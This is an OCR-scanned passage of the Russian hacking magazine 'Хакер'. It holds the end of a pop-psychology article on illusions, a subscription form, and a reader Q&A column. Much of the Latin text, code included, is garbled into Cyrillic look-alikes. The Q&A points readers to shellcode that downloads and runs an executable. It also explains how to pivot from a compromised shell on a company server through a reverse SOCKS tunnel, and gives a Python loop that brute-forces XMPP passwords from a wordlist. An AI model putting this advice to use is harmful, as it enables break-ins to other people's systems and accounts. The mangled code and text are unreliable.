• иллюзия Мюллера-Лайера, когда одинаковые по размеру фигуры 
воспринимаются как различные в зависимости от их завершения; 

• иллюзия Цельнера — хитрый вид штриховки, когда параллель- 
ные линии кажутся не параллельными; 

• автокинетическая иллюзия (см. рисунок) — наши любимые кру- 
жочки и полосочки, которые якобы вращаются, куда-то едут или 
вибрируют (если понаблюдать, то иллюзия чаще всего достига- 
ется за счет затемнения и высвечивания мелких частиц рисунка, 
причем «движение» происходит в затемненную сторону); 

• иллюзию движения неподвижных объектов, находящихся в раз- 
ных точках пространства, используют при создании мультфильмов. 
Почему так происходит? 

Органы восприятия и мозг не могут одновременно принять, 
обработать и запомнить все признаки воспринимаемого объекта, 
поэтому довольствуются только самыми ключевыми, на основе 
которых строят целостную картину. 

И она отличается от реальной именно разницей тех самых недо- 
воспринятых деталей. Более того, в разных контекстах набор вос- 
принятых сигналов может интерпретироваться также по-разному. 

Слуховые иллюзии 

Практически любой звук, поступающий извне и улавливаемый слу- 
ховыми рецепторами, мы стараемся соотнести с каким-либо источ- 
ником, причем чаще всего используем для этого уже полученный 
ранее опыт. Более того, первичным в этом соотношении является 
предполагаемое расстояние, на котором находится источник. В 
итоге неконкретный шум часто воспринимается как разговор или 
музыка где-то вдали, а, наоборот, сильный шум на далеком рассто- 
янии может казаться шорохом вблизи. Интересную слуховую иллю- 
зию описывает давно гуляющий по Сети «баян» — рассказ ученого 
Вильяма Джемса о том, как он перепутал храп своей комнатной 
собачки с шагами на чердаке: близкий тихий звук воспринимается 
как отдаленный громкий, а ассоциации и опыт помогают дорисо- 
вать воображаемую картину. 

И, наверное, наиболее известная и популярная с самого детства 
слуховая иллюзия — раковина возле уха: трансформированный звук 
окружающей среды (грохот машин, разговоры людей, порывы ветра) 
после обработки ракушкой звучат как шум морского прибоя. 

Еще одна особенность наших ушей: мы легко можем различить, 
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Автокинетическая иллюзия 



слева или справа, снизу или сверху поступает звук, но испытыва- 
ем большие трудности в локализации, если он прозвучит спереди 
или сзади. Почему так происходит, догадаться нетрудно. 

Эту ошибку восприятия исправил Хьюго Зукарелли — создатель 
холофонической звуковой технологии [ доо.дІ/іигСНЗ . Ты пропустил 
многое, если до сих пор не слышал такие записи (обычно они слу- 
шаются в хороших наушниках и с закрытыми глазами). Звук посту- 
пает таким образом, что ты чувствуешь его передвижение в разных 
направлениях: у тебя над головой шелестит газета, парикмахер 
чикает ножницами, вокруг головы летает тарахтящий коробок со 
спичками... 

Когнитивные (психологические) иллюзии 

Этот вид иллюзий строится на шаблонах и ошибках мышления, 
которые часто случаются при участии эффекта заражения (мы о нем 
когда-то говорили), а иногда играют адаптивную функцию — чело- 
веку не приходится долго думать, взвешивать и принимать реше- 
ния, все происходит быстро и на автомате: глюкануло, и готово. А 



порой срабатывает аналогия — если конкретное поведение было 
эффективным при одних условиях, то жертва иллюзий считает, что 
оно будет таким же и при других. И, кажется, никто из нас от этого 
не застрахован. Итак, какими бывают когнитивные иллюзии? 
Поведенческие: 

• Эффект повального увлечения — стадный эффект, о нем ты уже 
знаешь. 

• Систематическая ошибка подтверждения — все факты интерпре- 
тируются так, чтобы подтвердить имеющееся ранее мнение («все 
мужики — козлы!», при этом внимание обращается именно на такой 
тип мужчин). 

• Эффект вклада — человек хочет продать что-то дороже, чем сам 
готов заплатить за такой же товар. 

• Переоценка воздействия - «Ой, я точно не переживу этот экзамен!». 
Принцип «У страха глаза велики»: пугает не сам экзамен, а неизвест- 
ность, которая ждет впереди — даже если бы ты заранее знал, что 
экзамен закончится провалом, уровень страха был бы в разы ниже. 
Поэтому психологи рекомендуют перед каким-нибудь «неизвестно- 
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Ты тоже видишь несуще- Оптическая иллюзия 
ствующий квадрат? Мюллера-Лайера 




Если ты видишь тут дельфинов, у меня для тебя 
плохие новости 



Несуществующие линии Средняя линия кажется 
существуют длиннее, но это иллюзия 



страшным» событием наперед проиграть все возможные варианты 
(кстати, этим способом не гнушались великие полководцы). 

• Эффект знакомства — человек выражает необоснованную благо- 
склонность к другому только потому, что он с ним знаком. Кто бы мог 
подумать, ЧТО ЭТО ИЛЛЮЗИЯ? :) 

• Отвращение к потере — чтобы сильно не загружать тебя научными 
терминами, приведем народную мудрость: «Что имеем - не храним, 
потерявши — плачем». 

• Эффект сопротивления - «назло кондуктору куплю билет и пойду 
пешком». 

ОСНОВАННЫЕ НА ВЕРЕ И ВЕРОЯТНОСТЯХ: 

• Хоторнский эффект — другими словами, при наблюдении со сторо- 
ны начальника эффективность работы почему-то возрастает. 

• Иллюзия корреляции — призрачная связь между определенными 
действиями и результатами. На этой иллюзии основаны почти все 
народные приметы: черная кошка перешла дорогу - к несчастью, 
надо плюнуть три раза через левое плечо; идешь на экзамен - поло- 
жи 5 копеек под пятку. Будь уверен, если проигнорируешь напут- 
ствие приметы, самолет на голову не упадет, но в яму провалишься 
или подвернешь ногу точно (см. «Систематическая ошибка под- 
тверждения»), Это как раз тот случай, когда незнание закона осво- 
бождает от ответственности, потому что на незнающих примету (или 
не верящих в нее) — не действует, проверено. 



ИЛЛЮЗИИ ПАМЯТИ: 

• Криптомнезия — вид ложных воспоминаний, когда не отличают 
чужого, прочитанного или слышанного в воспоминаниях от своих 
собственных данных. 

• Ретроспективное искажение — при воспоминаниях о прошлых 
событиях тебе может казаться, что ты их предвидел. 

ВРЕМЕННЫЕ: 

• «Длительность минуты зависит оттого, по какую сторону двери 
туалета вы находитесь»: хорошо проведенное время пролетает 
быстро и незаметно, но такой же отрезок времени, проведенный в 
мучениях или ожидании, кажется намного длиннее. Допустим, при- 
ятное времяпрепровождение с девушкой пролетает очень быстро, а 
ожидание перед объявлением результата экзамена или собеседова- 
ния длится чуть ли не вечность. Объясняется тем, что когда ты занят, 
внимание сосредоточено на действии и мыслях, а не на ожидании и 
напряжении, которые растягивают ощущение времени. 

• Часто бывает, что заснув на 5-10 минут, после пробуждения кажет- 
ся, будто проспал несколько часов. 

Психосоматические «фокусы» 

Плацебо и ноцебо 

Плацебо — фокус нашего восприятия, когда ты ешь кусок мела в 
виде таблетки, думая, что это супермощное лекарство, и выздо- 



• ТестЛюшера 

На досуге попробуй пройти цветовой тестЛюшера ПизбегіезНги ). в 
большинстве случаев он достаточно точно «угадывает» твое теку- 
щее состояние и эмоциональный фон, исходя из того, какие цвета 
тебе наиболее симпатичны в данный момент. Значит, все-таки вза- 
имосвязь между цветом и эмоциями существует. Например, мало у 
кого черный цвет ассоциируется с легкомысленностью и беззабот- 
ностью, а оранжевый — с трауром или тяжестью. 



• Фрейд об иллюзиях 

«Иллюзии привлекают нас тем, что избавляют от боли, а в качестве 
замены приносят удовольствие. За это мы должны без сетований 
принимать, когда, вступая в противоречие с частью реальности, 
иллюзии разбиваются вдребезги». 
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Василий Кандинский, композиция 10. Живописно-колыбельная психологическая синестезия 



равливаешь на самом деле. Эксперименты ученых подтверж- 
дают высокую действенность этого эффекта. И поверь, бабки- 
целительницы очень успешно использовали это «открытие» еще 
до того, как его признали официальным. 

Ноцебо — наоборот, когда увидев нарисованный на двери крест 
или иголку с черной ниткой, ты сам себя можешь довести до 



тяжелого состояния, вообразив, что на тебя навели порчу. Наше 
подсознание запоминает ощущения и связывает их с опреде- 
лением. Допустим, симптомы — головокружение, тяжесть в 
животе, реакция регургитации, значит как следствие выводится 
определение — отравление. Так же и от обратного: если внушить 
человеку, что он отравлен — он выдаст все эти симптомы. В пси- 



• Синестезия, или как увидеть оранжево-треугольную музыку 



Синестезия — это произво- 
дная картины восприятия, 
комбинация разных органов 
чувств: зрение (фотизмы], 
слух (фонизмы), пространство, 
фигуры, тактильные, вкусовые, 
температурные ощущения. Если 
ты смотришь на картину и слы- 
шишь пение лесных птиц — это 
синестезия, если ты слушаешь 
музыку и непроизвольно пред- 
ставляешь накрывающие тебя 
фиолетовые волны или падаю- 
щую сверху синюю звездную 
пыль — это тоже синестезия. 
Соленый привкус во рту от 
шума прибоя или цифра 5, 
видимая всегда в определен- 
ном цвете, — это тоже она. 



Вообще говоря, «мурашки по 
коже» от увиденного, услы- 
шанного или прочитанного 
тоже можно отнести к ней же. 
Правда, здесь речь идет скорее 
о психологической синесте- 
зии, которую можно назвать 
воображением или образным 
мышлением (иногда — это 
нервная иррадиация], но есть и 
физиологическая — когда зали- 
пания между продуктами раз- 
ных органов чувств возникают 
очень четко, почти всегда и при 
этом не контролируются, что 
очень напрягает обладателей 
такого «чувственного» таланта. 
Анатомы объясняют это физио- 
логическими соединениями 



(мостами] между зрительными и 
слуховыми нервами. 

Многие творцы художественных 
ценностей выражали и выража- 
ют синестетические комбина- 
ции в своих работах. Наиболее 
яркие примеры: Василий 
Кандинский, картины которого 
вызывают ощущение тембра; 
Александр Скрябин, Николай 
Андреевич Римский-Корсаков, 
Клод Дебюсси, чья музыка 
вызывает цветовые ассоциа- 
ции и ощущение размера, для 
них даже ввели специальный 
термин - «цветной слух». Если 
тебя заинтересовала эта тема, 
полистай книжку «Психология 
музыки и музыкальных способ- 



ностей». Современники тоже не 
спят: светомузыка и аудионар- 
котики намного сильнее вызы- 
вают соощущение чувств, чем 
перечисленные выше способы. 
Не говоря уже об ЛСД, мескали- 
не и великом и ужасном Арбех 
Тѵѵіп’е... 

На самом деле, в легкой своей 
вариации синестезия буквально 
пронизывает метафорами нашу 
жизнь: тоска зеленая, леденящий 
душу взгляд, теплая встреча, 
кричащая внешность, сладкий 
сон, тяжело на душе, малиновый 
звон... В немецком языке даже 
существует слово «КІапдІагЬе», 
которое в переводе на русский 
означает «цвет звука». 
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хиатрической практике широко известен случай, когда здоровая 
женщина умерла от воображаемого СПИДа, начитавшись соот- 
ветствующей литературы. 

Зацепившись за один незначительный симптом, благодаря 
своей высокой мнительности она спровоцировала внутрипси- 
хически и все остальные, перестала выходить на улицу, вести 
активный образ жизни, что привело к ухудшению здоровья, а 
дальше - по нарастающей. На таком же механизме внушения 
строятся анальгезия (подавление боли с сохранением ощущений 
в теле] и анестезия (максимальное снижение чувствительности 
тела). 

Психогенная пурпура 

Ее еще называют синдромом Мюнхгаузена. Кто бы мог подумать: 
чтобы обратить на себя внимание врача, невротик-истеричка 
режет себя, щипает до посинения, пьет лекарства, вызывающие 
симптомы, похожие на серьезную болезнь. Конечно, в сообрази- 
тельности им не откажешь — нужно хорошо изучить литературу, 
выучить симптомы, найти лекарства или вещества, вызывающие 
такие же реакции, придумать, как сымитировать настоящую 
болезнь. 

А бедные врачи голову ломают — почему лечение не дает 
никаких результатов... Опытный врач, знающий о воспалении 
хитрости, идет на такую уловку: «Хм, я бы диагностировал у вас 
волчанку, если бы не отсутствие одного симптома, который не 
описан в справочниках, но встречается на практике». Дальше он 
называет какой-нибудь симптом, абсолютно от балды, и потом 
ждет и наблюдает, как больной пытается дополнить «недостаю- 
щий» признак болезни. После чего ему окончательно ставится 
диагноз «психогенная пурпура», и оформляется перевод в пси- 
хиатрическое отделение. 

Религиозные стигматы 

Особо продвинутые имитаторы не просто режут себя, а силой 
мысли и веры вызывают кровоточащие раны. Этот феномен 
встречается реже, чем пурпура, но он достоин удивления, ведь 
иногда появляются не только раны, но и капли крови из непо- 
врежденной кожи. 

Здесь решает не хитрость, а глубокая, фанатичная вера и чув- 
ствительность, причем психологическая. Говорят, Гоголь мог 
прочитать, как избивали человека, и настолько проникнуться его 
ощущениями, что через полчаса у него появлялись синяки и кро- 
воподтеки, а один раз даже отказали почки. 

Фантомная боль 

Первое время после потери конечности люди часто чувствуют 
покалывание или боль на ее месте, причем ощущения могут 
появляться даже через 5-7 лет после ампутации и носить очень 
сильный характер. Физиологи считают, что боль обусловлена 
центрами мозга, отвечающими за схему тела; психологи списы- 
вают все на телесную память; а эзотерики утверждают, что энер- 
гетическое эфирное тело существует еще какое-то время после 
потери физического, выдавая подобные ощущения. Одно можно 
сказать точно: окончательно механизмы фантомной боли пока не 
изучены. 

Вариации на тему чувствительности 

Наверное, ты слышал о пороге чувствительности, от силы которо- 
го зависит то, насколько чутко человек воспринимает улавливае- 
мые органами чувств сигналы, поступающие извне. Этот порог 
есть у всех, но существуют «перегибы» как в одну, так и в другую 
сторону. 

Гиперестезия - повышенная восприимчивость к раздражениям 
извне, когда незначительный звук может восприниматься болез- 
ненно оглушительным, а тусклый свет - ослепительно ярким. 
Ситуативно тебе знакомо это ощущение, когда в темноте резко 



включается дисплей ноутбука или экран мобильного. То же самое 
чувствует гиперестетик, только всегда. Гипостезия - чрезмерно 
низкая чувствительность к раздражениям, в том числе и боле- 
вым. В этом случае человек почти не реагирует, к примеру, на 
ползающую по лицу муху. 

Стокгольмский синдром 

Существует ряд случаев, когда жертва и злодей начинают испы- 
тывать друг к другу симпатию, причем у жертвы это списывается 
на защитную реакцию при сильном травматическом стрессе. 
Впрочем, другие исследователи выдвинули гипотезу, что плен- 
ный надеется на милость со стороны агрессора и для этого 
показывает свою симпатию ему. Вторая гипотеза — чушь, так как 
фальшивая «влюбленность» при таких обстоятельствах почув- 
ствуется и осознается довольно быстро. Что касается защитной 
реакции — да, что-то в этом есть, по схожему принципу часто 
формируется личность мазохиста в садо-мазо парах: чтобы избе- 
жать страданий, действия агрессора сексуализируются (погугли 
информацию про защитный механизм психики — инстинктуали- 
зация или сексуализация) и тем самым приобретают приятную 
подоплеку. 

внушение. Эксперименты 
Подъяпольского 

Петр Павлович Подъяпольский — первый гипнотерапевт на тер- 
ритории бывшего СССР, который еще во времена первой миро- 
вой войны оперировал солдат, анестезировав их «дозой» вну- 
шения, причем операции были достаточно сложными: удаление 
пули из пяточной кости, иссечение венозных узлов ног, резекция 
носовой перегородки. Кроме того, он проводил эксперименты, 
которые можно озаглавить как «На что способно внушение?». 
Один из шокирующих опытов — внушение ожогов: после воздей- 
ствия словом у подопытных появлялись волдыри, свойственные 
ожогам второй степени. Объяснить это можно тем, что каждый 
участок тела, каждый орган через спинной мозг и подкорку свя- 
зан нервами с корой головного мозга, которая хранит память о 
реакциях организма на что-либо (например, ожог), а при внуше- 
нии и прикосновении предметом, даже необязательно горячим, 
выдает такую же реакцию. 

Эта гипотеза подтверждается еще и тем, что не получилось 
вызвать ожог у людей, которые никогда его не переживали и не 
знают, как он ощущается. Так же, как невозможно передать вкус 
лимона, если ты никогда его не пробовал. 

Заканчиваем галлюцинировать 

Иллюзии нельзя назвать однозначно хорошим или однозначно 
плохим явлением — впрочем, как и все в этом призрачном мире. 
Но если знать их особенности, то иллюзии можно использовать 
в своих целях (или просто не пасть жертвой очередного глюка). 
Итак: 

• как ты уже успел понять, иллюзии часто возникают там, 
где недостаточно знаний или осознания происходящего. 
Соответственно, чем больше будешь знать и чем лучше осозна- 
вать свои стереотипные реакции восприятия, тем меньше шан- 
сов, что какая-нибудь иллюзия застигнет тебя врасплох; 

• однако, зная, чем вызываются иллюзии, ты можешь спокойно 
воспользоваться этим при достижении своих целей (о, коварный 
манипулятор!): да-да, вертикальные полосы в одежде действи- 
тельно визуально сделают тебя стройнее и выше, а какая-нибудь 
«тяжелая» по тембру музыка как рукой снимет излишнюю жизне- 
радостность твоего оппонента (впрочем, возможно и твою тоже); 

• если глубже изучить иллюзии какого-нибудь конкретного чело- 
века, можно логически вычислить особенности его психики, 
характера, установок, «карты мира» и тому подобное. 

Ну и самое главное: помни, что ты должен управлять иллюзиями, 
а не они тобой :). ц-ц 
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ОДПИСКА 



1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта зЬор. 

діс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных 
документов — купона и квитанции — 
любым из нижеперечисленных способов: 

• на е-таіі: зиЬзспЬейдІс.ги : 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 1 5280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 
5 эт., офис № 21 , 

ООО «Гейм Лэнд», отдел подписки. 

Внимание! Если произвести оплату в мае, то 
подписку можно оформить с июльского номе- 
ра. 

Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 
Москве в пределах МКАД. 






12 НОМЕРОВ - 2200 руб 
6 НОМЕРОВ - 1260 руб. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ ЖУРНАЛ 
НАМНОГО ДЕШЕВЛЕ! 




+ 



ПРИ ПОДПИСКЕ НА КОМПЛЕКТ 
ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 0Ѵ0: - ОДИН 
НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ. НЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 

ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 

ЕСТЬ ВОПРОСЫ? п иши на іпГойдІс.ги или звони по бесплатным 
телефонам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3- 
999 (для жителей других регионов России, абонентов сетей 
МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 2011 г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 
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Степан «Біер» Ильин ЦѵѵіІІег.сот/зІераЫ 




Есть вопросы — присылай 
на іад@геаІ.хакер.ги 



О: Мне нужен шелл-код, который бы 
загружал из Сети .ехе-файл и выполнял 
его в системе ѴѴіпсІоѵѵз 7. Удивительное 
дело, но нигде (в том числе на тіІѵѵОгт. 
сот) не могу найти рабочий вариант. 

А также шелл-код, сгенерированный 
МеТазрІоіі'ом, который опять отказыва- 
ется работать под ѴѴіпсІоѵѵз 7. Где взять 
действительно работающий вариант? 

А: Для экспериментов можно попробовать 
шелл -код, который опубликован в блоге вьет- 
намской зесигііу-компании Вкіз ( ЫМу/ШЬСН ). 
Ксожалению, авторы не предоставляли исход- 
ники, носам шелл-код на 100% работает. Ссыл- 
ка на исполняемый файл, который необходимо 
загрузить, размещается в конце шелл-кода. В 
основе разработки лежатдругие наработки с 
тіІѵѵОгт. сот , а также 100-байтовый шелл-код 
отБкуЫпесІ ( собе.доодІе.сот/рАл/32-ехес-саІ.с- 
збеЕсосІе ). запускающий саіс.ехе на всех 32- 
-битных версиях винды. 

О: Пишу инструкцию по безопасности 
для прогрессивных студентов эконо- 
мической специальности. В пункте 
«Безопасность браузера» хочу упо- 
мянуть какой-нибудь универсальный 
инструмент для проверки безопасности 
установленных плагинов (насколько я 



понимаю, это сейчас одна из основных 
угроз). Что посоветуете? 

А:Честно говоря, тутесть нюансы. Например, 
в боодіе Сбготе поумолчанию встроен меха- 
низм для выявления небезопасных плагинов, и 
необходимости в дополнительных инструмен- 
тах нет. Всякий раз при запуске устаревшего 
аддона пользователю выдается предупре- 
ждение. Впрочем, для установки доступно 
независимое отбоодіе’а решение в виде 
плагина БесЬгоѵѵзіпд ( ЫЩ/бОМпУи ). который 
выполняетаналогичные проверки. В случае 
с Могіііа Рігебох поискнебезопасных аддонов 
осуществляется с помощью специальной 
страницы Ріидіп Сбеск [ плогіЦа.сот/еп-ЦЗ/ 
ріидіпсбеск ). проверка при этом производится 
без необходимости устанавливать что-либо в 
систему. Забавно, что этот сервис работает и 
для других браузеров. 

Еще одним похожим инструментом является 
Сіиаіуз ВгоѵѵзегСбеск ( Ьгоѵѵзегсбеск.диаіѵз. 
сот ). Для каждого из браузеров сервис пред- 
ложит установить соответствующий плагин. 

Не могунеупомянутьи небезызвестную 
утилиту Бесипіа Р5І ( зесипіа.сот/ѵиІпегаЬІІІІу 
зсаппіпд/регзопаі ). Это, пожалуй, наиболее 
универсальный вариант, с помощью которого 
каждый может проверить на актуальность не 
только браузер и его расширения, но и другой 



установленный в системе софт. 

О: Работая в консоли винды, очень не 
хватает команды дгер. Как быть? 

А: Есть несколько решений. 

1. На самом деле, реализаций дгердля 
ѴѴіпсІоѵѵз сегодня предостаточно. Это 
БпиѴѴіп32( дпи\л/іп32.5кпеі ). ѴѴіпсіоѵѵздгер 
[ уѵіпдгер.сот ). 06111 Огер Рог ѴѴіпсІоѵѵз Ыеѵе. 
огд.ик/ЭоДѵѵаге/д гер ], два варианта Огер Рог 
ѴѴіпсІоѵѵз ( дгерЬгѵѵіпсІоѵѵз.сот . радез.іпіегіод. 
сотМсбаггоп/д гер.ЫтІ ) и многие другие. 
Выбирай. 

2 . В самой винде (начиная сХР) появилась 
пара команд, которые могут исправить по- 
ложение — это біпсі и более мощная бпсізіг, 
которая поддерживает регулярные выражения. 
Неудобство вызываетто, что поисковый запрос 
необходимо набирать в кавычках. Но отэтого 
можно избавиться, создав в системе алиас. Не- 
обходимый для этого с крипт создается одной 
единственной командой: 

есбо ^псізііг %1 %2 %3 %4 %5 > 
%5уз1:етгоо1:%\§гер . стсі 

Этотсценарий создается в %5уз1;етгоо1;%, 
поэтому выполнять его нужно из командной 
строки, запущенной с правами администра- 
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Ргоіес* ІІЬегкюіН — девайс для 
снифинга ВІиеІооИѵсетей, который 
можно собрать за $100 



тора. По сути, после этого можно пользоваться 
аналогом дгер’а, не задумываясь: 

С:\1л(іпсІоы5\5у5І:ет32>пе1:5І:а1: -ап | §пер ЫБТЕМ 

С : \1л(іпсІоы5\5у5І:ет32>ііпсІ5І:г Ы5ТЕМ 
ТСР 0.0.0.0:80 0.0. 0.0:0 І_І5ТЕІ\ІІІ\ІС 

ТСР 0.0.0.0:135 0.0. 0.0:0 І_І5ТЕІ\І]Ж 

ТСР 0.0.0.0:443 0.0. 0.0:0 І_І5ТЕІ\І]Ж 

[...] 

3. В Ро\л/ег5Ье(Ге есть свой мощный аналог 
дгер’а — это команда зеіесі-зігіпд. Для приме- 
ра найдем с ее помощью все файлы стекстом 
«хакер» внутри текущей директории: 

5е1ес1:-5І:гіп§ ,\*.* -ра1:1:егп "хакер" 

Важно, чтозеіесі-зіхіпд поддерживает регу- 
лярные выражения. Так что если есть задача, 
скажем, отыскать на диске С Л все М-файлы 
с нужным тебе текстом, то она легко решается 
так: 

§е1:-сІіі1сІі1:ет с:\ -іпсіисіе -гес \ 

| зе1ес1:-5І:гіп§ -ра1:1:егп \ 
"\ы+@[а-2А-2_]+?\. [а-гА-2]{2,,6}" 

О: А существует ли какая-нибудь встра- 
иваемая СУБД для веб-страниц? Что-то 
вроде БСИйе, но для веб-приложений? 

А: Конечно, есть немало простеньких баз 
данных, реализованных на ОаѵаЗсгірІ:. В одном 
из проектов мне довелось использовать одну 
из них, а именно Таііу РВ ЗаОУбЬ.сот ). По 
сути это ^-библиотека, которая работает как 
слой данных внутри любого веб-приложения. 
Можно воспринимать ее какбазу данных 501, 
но работающую в браузере. Из особенностей: 

• простой синтаксисдля использования; 

• высокая скорость работы; 

• всего 10 Кб кода; 

• простое подключение клюбому веб- 
приложению; 

• совместимость с большинством АОАХ- 
библиотек: ЛЗиегу, Оор, Ргоіоіуре, ЕХТ и 
прочими; 

• полноценный СПІЮ-интерфейс (команды 
Сгеаіе, ПеасІ, Іірсіаіе, Оеіеіе); 

• сортировка данных; 

• возможность создания сложныхзапросов; 




Карта исполнения кода приложе- 
ния, построенная с помощью Сосіе 
Соѵегаде Апаіузіз Тооіз и КсасНедгіпсІ 



• поддержка событий (опіпзегі:, опіірбаіе, 
опРетоѵ) и ихобработчиков. 

О: Пишу довольно сложное веб- 
приложение, где для большего удоб- 
ства необходимо реализовать горячие 
клавиши. Как это лучше всего сделать? 

А: Я рекомендую библиотеку ЗаѵаЗсгірІ: 
ЗЬогісиізІ-іЬгагѵ Ыерапгегпікоѵ.сот/ 
]5-5І"іог1:си1:5 ) отСтепана Резника, экс- 
разработчика Яндекса. Как говорит сам автор, 
библиотека проста и приятна в использовании. 
Убедиться в этом поможет пример. 

1. Добавляем горячую клавишу: 

$.БІіог1:си1:5.асІсІ({ 

1:уре: ' сіоіл/п', 
тазк: ' (Пті+А', 
бапсііег: -Рипс1:іоп() { 
сІеЬи§( ' С^гі+А' ); 

} 

}); 

2 . Добавляем еще одну: 

$.БІіог1:си1:5.асІсІ({ 

1:уре: 'ир', 
тазк: ' Ббі-р-Ь+В' , 
бапсііег: -Рипс1:іоп() { 
сІеЬи§( 'Ббі-РѢ+В' ) ; 

} 

}); 

3. Начинаем реагировать на шорткаты: 

$ . БІіог1:си1:5 . 5І:ап1: ( ) ; 

Вот и все! Строка, задающая сочетание 
клавиш, должна состоять из имен клавиш, 
разделенных плюсами. Можетбыть не более 
одной клавиши, отличной отСігі, ВЫй или АН. 
Поддерживаемые клавиши: 

• модификаторы: СМ, 5Ы1І:, АН; 

• цифры: 0— 9; 

• буквы: А— 2 (сазе-іпзепзібѵе); 

• специальные клавиши: Васкзрасе, ТаЬ, 

Епіег, Раизе, СарзЕоск, Езс, Зрасе, РадеІІр, 
РадеОоѵѵп, Епб, Ноте, Ееб!, ІІр, РідЫ;, Ооѵѵп, 
Іпзегі;, йеіеіе, Е1 — Е12,знаквопроса, минус, 
плюс. 




□ Н 




Поиск небезопасных расширений 
браузера 



Всего поддерживаются три тип а событий 
(параметр Іуре), по которым могут срабатывать 
обработчики: 

• сіоѵѵп — на нажатие клавиши или сочетания 
клавиш; 

• ир — на отпускание; 

• ЬоИ — на нажатие и удержание (обработчик 
будет вызван сразу после нажатия и потом бу- 
дет вызываться с некоторой периодичностью, 
пока нажата клавиша). 

При желании можно создать несколько 
списков горячих клавиш и легко между ними 
переключаться. Живая демонстрация доступна 
на сайте разработчика: зіерапгегпі коѵ. сот/ 
]з-зЬог1:си1:5 . 

О: В свое время было немало доработок 
для \Л/іпсІоѵѵ$, позволяющих придать 
системе вид Мае ОБ X, включая Ооск- 
панель, оформление и поведение окон 
и так далее. Однако в «семерке» все из 
того, что я пробовал ранее, работает 
криво. Как быть? 

А: Советую І_іоп5кіп РаскЗ.О РогЗеѵеп 
( ЬатесІсІапдег.сІеѵіап1:агЕсот/#/сІЗЬд7Ід ). 

Это самый быстроразвивающийся набор до- 
работокдля винды, ктомуже он, каквидно из 
названия, реализуетвнешний видтолько что 
вышедшей версии МасОЗХЫоп. 

О: У меня есть шелл для сервера, 
который, помимо прочего, находится 
во внутренней сети предприятия. Я 
установил на него БОСКБ-сервер, чтобы 
использовать его для удобного подклю- 
чения к другим хостам внутри локалки (к 
примеру, веб-админкам через браузер 
со своей машины). Однако файрвол 
блокирует все подключения к БОСКБ. 
Как быть? 

А: Удобнее всего воспользоваться 50СК5- 
сервером с обратным (геѵегзе) подклю- 
чением. Проверенный вариант — зЗоскз 
( зоигсеЬгде.пе1:/рго]ес1:5/550ск5 ). Выглядит 
это следующим образом. На локальном 
компьютере запускается клиентская часть 
гезоекз, которая слушает два порта. На 
первый (скажем, 1 080) будет осуществлять 
обратное подключение (Ьасксоппесі:) сер- 
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верная часть разработки, на второй (пусть 
это будет 1 088) будем обращаться мы сами. 
Далее на удаленном шелле мы запускаем 
как раз серверную часть гззоскз, указав для 
подключения наш ІР-адрес и порт (1 080). 
Готово! Послетого, каксерверная часть осу- 
ществит геѵегзе-подключение, мы сможем 
прописать в любой программе локальный 
50СК5-сервер (он у нас «слушает» порт 1 088) 
и без проблем подключаться кхостам внутри 
локальной сети удаленного компьютера 
(веб-админкам, 55Н -серверам и та к далее). 
Видеодемонстрация доступна здесь: ѵітео. 
сот/22515255 . 

О: Подскажи брутфорсер для ЗаЬЬег'а 
(ХМРР), который поддерживал бы все 
нюансы протокола. 

А: В последней версии всем известной 
ТНС-НусІга ( іЬс.огдЛЬс-ЬусІга ) очень силь- 
но прокачан модульдля подбора пароля к 
ХМРР-аккаунтам. Впрочем, на писать утилиту 
для подбора пароля для многих протоколов, в 
том числеХМРР, можно и самому. Благодаря 
готовому модулю ХМРР процедура перебора 
пароля на том же Руібоп может быть предельно 
проста: 

ИЮ = пате@зегѵег.ог§ 

■Рог раззыогсі іп могсііізі: 

ИЮ = хтрр.ргоіосоІ.ІІІООіО) 
сііепі: = хтрр.С1іеп1:( 

1Ю.§е1:Оотаіп() , сІеЬи§=[]) 
сопп = сІіепі.соппесіО 
аііііі = сііепі:. аиТИ( 

ІЮ.^еіІМосІеО , равзыогсі^ 
ге5оигсе=1Ю.§е1:Ке5оигсе()) 
іі аиіб == ' 5а5І ' : 
ргіпі разБыопсІ 
5у5.ехіі(1) 
сііепі . сІІ5соппес1:( ) 

Каждая строчка кода говорит сама за себя. 

О: Какие интересные разработки есть в 
области автоматизированного поиска 
руткитов? 

А: Ятакпонимаю, что речьидетоб инструмен- 
тах для более-менее опытныхлюдей, которым 
